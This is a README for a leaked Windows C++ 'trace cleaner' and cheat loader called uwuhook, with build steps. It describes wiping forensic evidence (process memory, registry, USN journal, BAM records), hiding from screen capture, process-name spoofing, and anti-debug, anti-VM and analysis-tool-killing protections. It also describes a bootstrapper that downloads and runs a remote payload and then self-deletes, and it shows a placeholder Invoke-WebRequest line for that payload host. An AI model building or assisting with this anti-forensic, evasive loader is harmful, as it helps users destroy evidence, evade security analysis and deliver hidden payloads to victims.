A 64-bit Windows 10/11 usermode application written in C++ that provides comprehensive trace cleaning and forensic removal capabilities, wrapped in a modern ImGui-based GUI with multi-layer anti-analysis protection.
Note
Project Origin & Attribution: This source code was self-leaked by the original author (ego / @humbleness on Discord) for educational purposes. Please do not redistribute without giving credit. Original project site: https://uwuhook.club
Warning
This application interacts with sensitive system areas including process memory, the registry, USN journals, and kernel-level drivers. It is intended for educational and security research purposes only.
- Trace Cleaner: Scans and wipes specific strings from live process memory using a
c_cleaner::clear_memoryroutine, with an optional DPS (Deeper Cleaning) mode for more thorough removal. - Registry Cleaning: Targeted deletion of registry keys and values via
c_cleaner::clear_regedit, removing forensic artifacts left behind by monitored applications. - USN Journal Wiping: Calls
c_cleaner::clear_usn_journalto delete NTFS file operation records from the Change Journal on a specified drive (requires Administrator). - BAM Trace Removal: Clears Background Activity Moderator evidence via
c_cleaner::clear_bam_traces, removing records of recently executed binaries (requires Administrator). - Pattern-Based File Deletion:
c_cleaner::delete_fileremoves files matching a name pattern from a given path, supporting%temp%and other environment variable expansions. - Comprehensive Module Cleaning: The
modules::c_modulesclass orchestrates multi-stage cleaning across processes, services, system cache, network settings, free-space wiping, and USN journals. - Streamer Mode: Applies
WDA_EXCLUDEFROMCAPTUREviaSetWindowDisplayAffinityand removes the window from the taskbar usingITaskbarList, hiding the tool from screen capture software. - Bootstrapper / Injector:
inject.hppprovides abootstrap()routine that downloads and executes a secondary payload from a CDN URL, then self-deletes using VMProtect-guardedShellExecuteA. - Process Rename:
LegitRename::Rename()inheaders/rename.hchanges the running process's name at runtime for evasion. - Embedded Startup Sound: A 361KB WAV file is stored inline in
headers/intro.haswavData[]and played viaPlaySoundAon launch.
The protection/ subsystem provides staged anti-analysis coverage controllable via ProtectionStage enum:
| Stage | Enum | Behaviour |
|---|---|---|
| None | STAGE_NONE |
All protections disabled |
| Initial | STAGE_INITIAL |
Anti-dump + thread hiding |
| Continuous | STAGE_CONTINUOUS |
Anti-debug + process scanning loop |
| Full | STAGE_FULL |
All checks active (default at startup) |
| Module | Files | Description |
|---|---|---|
| Anti-Attach | anti_attach.cpp/.h |
Prevents debugger attachment to the process |
| Anti-Debugger | anti_debugger.cpp/.h |
Detects and blocks active debugging attempts |
| Anti-Dump | anti_dump.cpp/.h |
Prevents memory dump extraction |
| Anti-VM | anti_vm.cpp/.h |
Detects virtual machine environments and exits |
| Integrity Check | integrity_check.cpp/.h |
Validates application image integrity at runtime |
| Kill Process | kill_process.cpp/.h |
Terminates known monitoring/analysis processes |
| Protect Main | protectmain.cpp/.h |
Orchestrates all stages via mainprotect(ProtectionStage) |
- VMProtect (
VMProtect/): SDK headers +VMProtectSDK64.dll/.libused to wrap sensitive routines inVMProtectBeginUltra/VMProtectBegin/VMProtectEndblocks. - Lazy Importer (
lazy importer/lazy_importer.hpp): Resolves Windows API imports at runtime to avoid static import table analysis. - ObfusHeader (
obfusheader/obfusheader.h): Compile-time obfuscation macros applied to constants and control flow throughout the codebase.
Login is handled through the KeyAuth API using the files in libs/keyauth/:
| File | Role |
|---|---|
auth.hpp |
Main KeyAuth API wrapper (api class, license(), init()) |
json.hpp |
Bundled JSON parser for API response handling |
skStr.h |
skCrypt compile-time string encryption for API credentials |
utils.hpp |
Utility helpers for the auth flow |
The login page presents a key input field, a server selector (United Kingdom / Russia), and a Save credentials checkbox that writes the license key to C:\license.uwu (or %USERPROFILE%\Documents\license.uwu as fallback). Successful authentication advances to the panel selection page.
Built on Dear ImGui (DirectX 11 backend) with a FreeType font renderer. Window dimensions are fixed at 480 × 420 pixels. The UI is split into two pages:
Key entry, server selection, login/exit buttons, streamproof toggle, and credential save option.
A three-entry list with status indicators and a simulated human-like loading progress bar (randomised jitter, easing, and occasional stalls):
| Entry | Description | Status |
|---|---|---|
| Trace Cleaner | Universal memory/registry/file cleaner | Undetected |
| Roblox External | External cheat loader (placeholder) | In Development |
| Github | Opens developer socials/repository | Undetected |
uwuhook/
├── build/Release/ # Compiled output: license.bin, VMProtectSDK64.dll
├── cleaner/ # Core cleaning engine
│ ├── cleaner.cpp/.hpp # c_cleaner: memory, registry, USN, BAM, file deletion
│ ├── memory.cpp/.hpp # Low-level memory read/write helpers
│ ├── modules.cpp/.hpp # c_modules: orchestrates full cleaning pipeline
│ └── utils.hpp # Shared utilities for the cleaner
├── headers/
│ ├── intro.h # Embedded WAV startup sound (361KB inline byte array)
│ ├── protection.h # Protection:: namespace wrapper (enable_full/basic/etc.)
│ └── rename.h # LegitRename: runtime process name spoofing
├── icons/ # Application icons (SteelSeries / Vencord disguise assets)
├── imgui/ # Dear ImGui source + FreeType integration
│ └── backend/ # imgui_impl_dx11 + imgui_impl_win32
├── libs/
│ ├── keyauth/ # KeyAuth API: auth.hpp, json.hpp, skStr.h, utils.hpp
│ └── xor/xorstr.hpp # Compile-time XOR string encryption
├── main/
│ ├── includes.hpp # All standard + Windows + external headers
│ ├── inject.hpp # bootstrap(): CDN payload download + execution
│ ├── main.cpp # Entry point, Win32 window, DX11 render loop
│ ├── main.hpp # c_main class, KeyAuth init, UI page definitions
│ └── product.hpp # TimeManager: timestamp parsing for panel status
├── protection/
│ ├── checks/ # Anti-attach, anti-debug, anti-dump, anti-VM, integrity, kill-process
│ ├── lazy importer/ # lazy_importer.hpp: runtime API resolution
│ ├── obfusheader/ # obfusheader.h: compile-time code obfuscation
│ └── VMProtect/ # VMProtectSDK.h + SDK64 DLL/LIB
├── ui/
│ ├── fonts.hpp # Font atlas definitions (fonts_ enum, FreeType config)
│ └── ui.cpp/.hpp # Render loop helpers, page system, child window wrappers
├── catpaw client loader.vcxproj # Visual Studio project file
├── library_x64.lib # Precompiled support library
├── resource.h # Windows resource definitions
├── uwuhook.rc # Resource script (icons, version info)
└── uwuhook.sln # Visual Studio solution
- Visual Studio 2022 with the Desktop development with C++ workload
- Windows SDK 10.0+
- DirectX SDK (or use the Windows SDK bundled version)
- Open uwuhook.sln in Visual Studio.
- Build under Release | x64 to produce the loader executable.
- The
build/Release/directory must containVMProtectSDK64.dllalongside the compiled binary at runtime.
Before building, update the KeyAuth credentials in main/main.hpp:
std::string name = skCrypt("your_app_name").decrypt();
std::string ownerid = skCrypt("your_owner_id").decrypt();And point the CDN URL in main/inject.hpp to your payload host:
"Invoke-WebRequest 'https://your-cdn-url/payload.exe' ..."This software is provided for educational, security research, and testing purposes only. Portions of this codebase were modified, updated, or developed with the assistance of Artificial Intelligence (AI) models. The authors and contributors assume no liability for misuse, system damage, or issues arising from the deployment of this application in production or untrusted environments.